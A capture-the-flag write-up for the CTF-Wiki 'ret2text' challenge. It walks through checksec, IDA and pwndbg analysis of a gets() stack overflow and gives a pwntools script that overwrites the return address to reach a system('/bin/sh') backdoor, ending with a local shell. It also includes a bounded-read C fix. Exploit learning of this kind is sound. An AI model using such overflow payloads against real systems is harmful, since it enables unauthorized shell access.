Challenge source

Download: https://raw.githubusercontent.com/ctf-wiki/ctf-challenges/master/pwn/stackoverflow/ret2text/bamboofox-ret2text/ret2text
PS: the challenge comes from CTF-Wiki.

Analysis

File type

┌──(kali㉿kali)-[~/Desktop/pwn]
└─$ file ret2text
ret2text: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=4f13f004f23ea39d28ca91f2bb83110b4b73713f, with debug_info, not stripped

The program is a 32-bit ELF binary.

Protections

┌──(kali㉿kali)-[~/Desktop/pwn]
└─$ checksec --file=ret2text
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY Fortified       Fortifiable     FILE
Partial RELRO   No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   83 Symbols        No    0               2               ret2text

The only protection that appears to be enabled is NX. NX marks the stack non-executable, so shellcode placed there cannot run; with no PIE and no canary, code that already exists in the binary can still be reused, which is what ret2text does.

IDA analysis

The main function looks like this:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s[100]; // [esp+1Ch] [ebp-64h] BYREF

  setvbuf(stdout, 0, 2, 0);
  setvbuf(_bss_start, 0, 1, 0);
  puts("There is something amazing here, do you know anything?");
  gets(s);
  printf("Maybe I will tell you next time !");
  return 0;
}

We can see that gets writes into s, but s is only 100 bytes long and gets performs no bounds check, so this is a simple stack overflow. A backdoor function was also found in the program; its code is as follows:

void secure()
{
  unsigned int v0; // eax
  int input; // [esp+18h] [ebp-10h] BYREF
  int secretcode; // [esp+1Ch] [ebp-Ch]

  v0 = time(0);
  srand(v0);
  secretcode = rand();
  __isoc99_scanf((int)&unk_8048760, (int)&input);
  if ( input == secretcode )
    system("/bin/sh");
}

The system("/bin/sh") call is the backdoor that was left behind. Let's look at it in detail:

.text:0804863A ; 11:     system("/bin/sh");

Its address is 0x0804863A.

Attack approach

Use the stack overflow to overwrite main's return address with the backdoor's address, 0x0804863A. How many bytes are needed to reach the return address is not yet known, so some dynamic analysis is required.

pwndbg analysis

┌──(kali㉿kali)-[~/Desktop/pwn]
└─$ gdb ret2text
pwndbg> b main
pwndbg> r
pwndbg> n
pwndbg> n
pwndbg> n
hello
25      in ret2text.c
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
───────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────
*EAX  0xffffcf1c ◂— 'hello'
 EBX  0xf7e23e34 (_GLOBAL_OFFSET_TABLE_) ◂— 0x223d2c /* ',="' */
*ECX  0xf7e258ac (_IO_stdfile_0_lock) ◂— 0
 EDX  0
 EDI  0xf7ffcb80 (_rtld_global_ro) ◂— 0
 ESI  0x80486d0 (__libc_csu_init) ◂— push ebp
 EBP  0xffffcf88 ◂— 0
 ESP  0xffffcf00 —▸ 0xffffcf1c ◂— 'hello'
*EIP  0x80486b3 (main+107) ◂— mov dword ptr [esp], 0x80487a4
─────────────────────────────────────────────────────────────[ DISASM / i386 / set emulate on ]─────────────────────────────────────────────────────────────
  ......
─────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────
......
───────────────────────────────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────────────────────────────── 
......
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> 

Only the important operations and output are shown here. The key part of the output is:

*EAX  0xffffcf1c ◂— 'hello'
 EBX  0xf7e23e34 (_GLOBAL_OFFSET_TABLE_) ◂— 0x223d2c /* ',="' */
*ECX  0xf7e258ac (_IO_stdfile_0_lock) ◂— 0
 EDX  0
 EDI  0xf7ffcb80 (_rtld_global_ro) ◂— 0
 ESI  0x80486d0 (__libc_csu_init) ◂— push ebp
 EBP  0xffffcf88 ◂— 0
 ESP  0xffffcf00 —▸ 0xffffcf1c ◂— 'hello'
*EIP  0x80486b3 (main+107) ◂— mov dword ptr [esp], 0x80487a4

The distance between EBP and the start of s (0xffffcf1c, the address gets just wrote to, visible in EAX) is 0xffffcf88 - 0xffffcf1c = 4294954888 - 4294954780 = 108 (you can simply compute 0x88 - 0x1c; the full values are written out here so that beginners can follow). 4 more bytes must be added to that distance, because the goal is to write into the return address, which sits 4 bytes above the saved EBP on the stack, so the padding is 108 + 4.

============================
        return address
============================
    saved %ebp (4 bytes)
============================
     xxxxx  (buffer s)
============================
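Before moving on to the exploit, here is the defensive counterpart, as an added example that is not part of the original writeup or the challenge binary: the same 100-byte buffer read with a bounded reader instead of gets(), fed the 112-byte line the calculation above arrives at. BUF_SIZE, read_line_bounded and feed_run are names of my own, and the input is constructed inside the program.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE 100   /* same size as s[100] in the writeup's main() */
/* Bounded replacement for the writeup's gets(s): stores at most size-1 bytes
 * plus a NUL, discards the rest of an over-long line (setting *truncated), so
 * excess input reaches neither the saved EBP/return address nor the next read. */
long read_line_bounded(FILE *in, char *buf, size_t size, int *truncated) {
    *truncated = 0;
    if (size == 0 || fgets(buf, (int)size, in) == NULL)
        return -1;                         /* EOF or error before any byte */
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[--len] = '\0';                 /* drop the newline, as gets() did */
    } else {
        int c;                             /* no newline seen: line did not fit */
        while ((c = fgetc(in)) != EOF && c != '\n')
            *truncated = 1;
    }
    return (long)len;
}

/* Outcome of feeding n 'A's, a newline and then "next" through the reader:
 * bytes stored, truncation flag, length of the next line (4 only if drained). */
struct run_result { long stored; int truncated; long next_len; };

struct run_result feed_run(size_t n) {
    struct run_result r = { -1, 0, -1 };
    char *line = malloc(n + 7);            /* constructed: n 'A's + "\nnext\n" */
    FILE *in = tmpfile();
    if (line != NULL && in != NULL) {
        char s[BUF_SIZE];
        int t2;
        memset(line, 'A', n);
        memcpy(line + n, "\nnext\n", 7);
        fwrite(line, 1, n + 6, in);
        rewind(in);
        r.stored = read_line_bounded(in, s, sizeof s, &r.truncated);
        r.next_len = read_line_bounded(in, s, sizeof s, &t2);
    }
    if (in != NULL) fclose(in);
    free(line);
    return r;
}

int main(void) {                           /* prints stored=99 truncated=1 next=4 */
    struct run_result r = feed_run(112);   /* the writeup's 108 + 4 byte length */
    printf("stored=%ld truncated=%d next=%ld\n", r.stored, r.truncated, r.next_len);
    return 0;
}
```

With the bounded reader the 112-byte line stops at 99 stored bytes, so the saved EBP and return address are never touched, and the surplus does not bleed into the following read.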

Exploit with pwntools

from pwn import *

io = process("./ret2text")

# address of the system("/bin/sh") call inside secure(), taken from IDA
target = 0x804863a

# 108 bytes from the start of s up to the saved EBP, 4 more to cover the saved
# EBP itself, then the return address is overwritten with the backdoor address
payload = b"A" * (108 + 4) + p32(target)

io.sendline(payload)

io.interactive()

io.close()

Result

┌──(kali㉿kali)-[~/Desktop/pwn]
└─$ python test.py 
[+] Starting local process './ret2text': pid 35232
[*] Switching to interactive mode
There is something amazing here, do you know anything?
Maybe I will tell you next time !$ ls
core  ret2text    run  test.py
$ pwd
/home/kali/Desktop/pwn
$ exit
[*] Got EOF while reading in interactive
$ 
[*] Process './ret2text' stopped with exit code -11 (SIGSEGV) (pid 35232)
[*] Got EOF while sending in interactive
Last modified: 3 June 2024